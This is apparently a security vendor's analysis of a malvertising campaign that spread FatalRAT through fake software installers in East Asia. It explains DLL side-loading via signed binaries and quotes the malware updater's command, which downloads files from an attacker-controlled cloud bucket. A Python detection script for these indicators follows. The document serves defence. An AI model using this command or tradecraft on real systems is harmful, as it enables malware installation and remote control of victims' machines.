We reported these ads to Google and they were promptly removed.

The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China. We observed victims mostly in Southeast and East Asia, suggesting that the advertisements were targeting that region. We observed these attacks between August 2022 and January 2023, but according to our telemetry previous versions of the installers have been used since at least May 2022.

Figure 1 shows a heatmap with the countries where we detected the attacks between August 2022 and January 2023. None of the malware or network infrastructure used in this campaign has been matched to known activities of any named groups, so for now we have not attributed this activity to any known group. Most of the attacks affected users in Taiwan, China and Hong Kong.

Figure 6. Malicious installers uploaded by the attackers to their cloud storage on January 6th, 2023

When these installers are executed, they usually:

- Drop and execute the malicious loader, and files needed to run the FatalRAT malware, in the %PROGRAMDATA%\Progtmy directory.
- Drop the malicious updater and related files in the %PROGRAMDATA%\Progtmy\0 directory.
- Drop a file named ossutilconfig in the %USERPROFILE% directory. This file contains credentials used by the updater to connect to a remote bucket in the Alibaba Cloud.
- Create an empty directory %PROGRAMDATA%\Progptp (although we observed some cases where the FatalRAT malware was installed in this directory instead).
- Drop and execute the legitimate installer in C:\Program Files\Common Files (see CommonFiles64Folder).
- Create scheduled tasks to execute the loader and updater components.

The malware is run by side-loading a malicious DLL, libpng13.dll, which is used by sccs.exe (Browser Support Module), a legitimate executable developed by Xunlei. The original libpng13.dll is also included in the installer package (renamed to what appears to be a random name) because the malicious DLL forwards its exported functions to the original DLL. Some of the forwarded exports in the malicious DLL are shown in Figure 7.

Figure 7. Part of the exported functions in the malicious DLL that are forwarded to the original

The image shows that the original DLL was renamed to BHuedjhd.dll in this example and that the malicious DLL was compiled as Dll22.dll.

The malware updater is executed in a similar manner, by side-loading dr.dll, used by a legitimate, signed binary developed by Tencent. The malicious DLL is very simple and executes OSSUTIL (included in the installer package as ssu.exe) to download files from an attacker-controlled bucket in Alibaba Cloud. The command executed by the DLL is:

`cmd /C "C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ --update"`
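The two behaviours described above, a renamed OSSUTIL pulling from an object-storage bucket out of %PROGRAMDATA% and a named DLL being side-loaded from that same directory, are simple to express as detection logic over endpoint telemetry. The following Python is an added example written for this page, not code from ESET or from the campaign; the event field names (`image`, `parent`, `cmdline`, `loaded`) are an assumption loosely modelled on Sysmon process-creation and image-load events, and the sample events are constructed, reusing only the paths, DLL names and bucket name quoted in the text.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

PROGRAMDATA = r"c:\programdata"

# DLL names the write-up reports as side-loaded by legitimate signed binaries.
SIDELOAD_DLLS = {"libpng13.dll", "dr.dll"}

# OSSUTIL copy syntax as seen in the quoted command:
#   <exe> cp -r oss://<bucket>/<path> <destination> --update
OSS_COPY_RE = re.compile(r'(?P<exe>\S+\.exe)\s+cp\s+.*?\boss://(?P<bucket>[^/\s"]+)', re.IGNORECASE)

# Constructed sample events (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\ProgramData\Progtmy\sccs.exe",
     "cmdline": r'cmd /C "C:\ProgramData\Progtmy\2\ssu.exe cp -r oss://occ-a1/dll/3/ C:\ProgramData\Progtmy\ --update"'},
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd /C "dir C:\Users"'},
    {"type": "imageload", "image": r"C:\ProgramData\Progtmy\sccs.exe",
     "loaded": r"C:\ProgramData\Progtmy\libpng13.dll"},
    {"type": "imageload", "image": r"C:\Program Files\Vendor\app.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},
]


@dataclass
class Finding:
    rule: str
    detail: str


def _under_programdata(path: str) -> bool:
    """True when a Windows path sits anywhere below C:\\ProgramData."""
    return path.lower().replace("/", "\\").startswith(PROGRAMDATA + "\\")


def check_process(event: dict) -> Optional[Finding]:
    """Flag an OSSUTIL-style bucket copy launched from a binary under ProgramData."""
    match = OSS_COPY_RE.search(event.get("cmdline", ""))
    if not match:
        return None
    exe = match.group("exe").strip('"')
    if _under_programdata(exe):
        return Finding("oss_bucket_fetch", f"{exe} pulls from bucket {match.group('bucket')}")
    return None


def check_imageload(event: dict) -> Optional[Finding]:
    """Flag one of the named DLLs being loaded from a ProgramData directory."""
    loaded = event.get("loaded", "")
    name = loaded.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in SIDELOAD_DLLS and _under_programdata(loaded):
        return Finding("dll_sideload", f"{event.get('image')} loaded {loaded}")
    return None


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run every rule over a stream of events and collect the hits."""
    findings: List[Finding] = []
    for event in events:
        if event.get("type") == "process":
            hit = check_process(event)
        elif event.get("type") == "imageload":
            hit = check_imageload(event)
        else:
            hit = None
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.detail}")
```

The image-load rule is deliberately narrow (specific DLL names under %PROGRAMDATA%) so it stays cheap and low-noise; a broader side-loading heuristic would compare the DLL's directory with the loading executable's and with the system directories. The bucket-copy rule keys on the `oss://` scheme together with the executable's location, since OSSUTIL itself is a legitimate tool and only its placement and use here are suspicious.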